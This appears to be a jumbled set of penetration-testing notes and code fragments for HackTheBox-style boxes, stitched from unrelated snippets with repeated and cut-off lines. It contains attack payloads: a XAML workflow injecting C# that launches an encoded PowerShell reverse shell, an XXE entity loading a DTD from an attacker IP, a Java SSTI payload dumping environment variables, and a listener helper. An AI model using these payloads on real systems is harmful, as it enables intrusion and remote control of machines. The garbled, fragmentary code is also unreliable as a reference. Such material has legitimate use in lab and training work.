- By default, it will start the listener on port 9090. You can specify the port you want it to start with:
shell 9001
shell() {
if [[ $1 ]]; then
port=$1
else
port=9090
fi
#!/bin/bash
# Base directory for HTB box data (the tilde is expanded by the shell during assignment).
HTB_DATA_DIR=~/Documents/HTB

# Guard clause: a box name must be supplied as the first argument, otherwise
# print the usage line and stop.
if [[ -z $1 ]]; then
    echo "Usage: $0 <Box name>"
    exit 1
fi
a=1
shell 9001
shell() {
if [[ $1 ]]; then
port=$1
else
port=9090
fi
<?xml version="1.0" encoding="UTF-8"?> | |
<WorkflowService xmlns="http://schemas.microsoft.com/netfx/2009/xaml/servicemodel" xmlns:mca="clr-namespace:Microsoft.CSharp.Activities;assembly=System.Activities" xmlns:p1="http://schemas.microsoft.com/netfx/2009/xaml/activities" xmlns:sd="clr-namespace:System.Diagnostics;assembly=System" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" ConfigurationName="Service1" Name="Service1"> | |
<p1:Sequence DisplayName="Sequential Service"> | |
<p1:InvokeMethod DisplayName="test" MethodName="Start"> | |
<p1:InvokeMethod.TargetObject> | |
<p1:InArgument x:TypeArguments="sd:Process"> | |
<mca:CSharpValue x:TypeArguments="sd:Process">/*/System.Diagnostics.Process.Start("");return base.RewriteExpressionTree(expression);} | |
System.Diagnostics.Process x =System.Diagnostics.Process.Start("cmd.exe", "/c powershell -exec bypass -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4 |
ll
# Long listing of every entry (including dotfiles) with human-readable sizes and type indicators.
alias ll='ls -alhF'
xclip
in your system. This lets you copy the output of a command directly to your clipboard: `cat file.txt | c`
# Send stdin to the X11 clipboard selection so piped command output can be pasted elsewhere.
alias c='xclip -selection clipboard'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM 'http://10.10.14.101/kavi.dtd'> %xxe;]>
<credits>
<author>&xxe;</author>
</credits>
Typically Java SSTI payloads start with `$`. But if that character is banned, `*` can be used instead.
Get env vars
*{T(java.lang.System).getenv()}
/etc/passwd
)#!/usr/bin/env python | |
from PIL import Image, FontFile, ImageFont, ImageDraw | |
class RenderText2Image: | |
##Defines | |
FULL_PATH_TO_FONT = './LiberationMono-Regular.ttf' | |
_bgcolor = None | |
_fontColor = None | |
_text = None | |
_error, _errmsg = 1, None |
from Crypto.PublicKey import RSA | |
from base64 import b64encode as b64 | |
def int2bytes(number):
    """Return the big-endian byte string encoding of a non-negative int.

    The length is the smallest whole number of octets that holds
    ``number.bit_length()`` bits, so ``0`` encodes as ``b""``.
    Negative values raise ``OverflowError`` from ``int.to_bytes``.
    """
    # Ceiling division: round the bit length up to whole octets.
    octets = -(-number.bit_length() // 8)
    return number.to_bytes(octets, "big")
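# Load the RSA public key from disk. The context manager closes the file
# even when RSA.importKey raises on malformed input; the original
# open()/close() pair leaked the handle on that path. `fp` stays bound
# (closed) afterwards, as it did after the explicit close().
with open("publickey.crt", "r") as fp:
    key = RSA.importKey(fp.read())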